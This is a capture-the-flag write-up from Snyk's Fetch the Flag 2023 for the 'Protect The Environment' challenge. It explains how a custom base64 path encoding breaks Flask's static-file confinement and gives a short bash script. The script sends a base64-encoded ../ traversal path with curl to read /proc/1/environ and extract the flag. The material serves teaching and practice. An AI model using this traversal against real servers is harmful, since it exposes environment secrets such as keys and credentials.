Snyk Fetch the Flag CTF 2023 writeup: Protect The Environment

Thanks for playing Fetch with us! Congrats to the thousands of players who joined us for Fetch the Flag CTF. If you were at Snyk’s 2023 Fetch the Flag and are looking for the answer to the Protect The Environment challenge, you’ve come to the right place. Let’s walk through the solution together!

The challenge uses a hand-rolled base64 encoding layer for paths. This seems fine, but it breaks Flask's ability to automatically chroot static files. This is a file inclusion attack, but instead of including a file, you include the /proc/<pid>/environ file. The user is not told or given any way to discover the PID, but this is not a problem since PID 1 works (or you can simply enumerate them and you'll get a hit on PID 8, as that is what Gunicorn workers use).

#!/bin/bash

if [[ -z "$1" ]]
then
    echo "IP address or hostname not specified"
    exit 1
fi

if [[ -z "$2" ]]
then
    echo "Port not specified"
    exit 1
fi

curl -s http://$1:$2/`echo "assets/../../../../../../proc/1/environ" | base64` -o - | strings | grep -oE "flag{.*?}" --color=none

Thanks for making Fetch happen!

A huge thank you to all the teams in Fetch the Flag 2023! It was great seeing all of you there and you can always find me on YouTube.

Here are the writeups for the other 2023 challenges. Dig in!

• Audiopolis

• Honey Baked Messages

• I Do Math

• Off the SETUID

• Silent Cartographer

• Writeups from the community!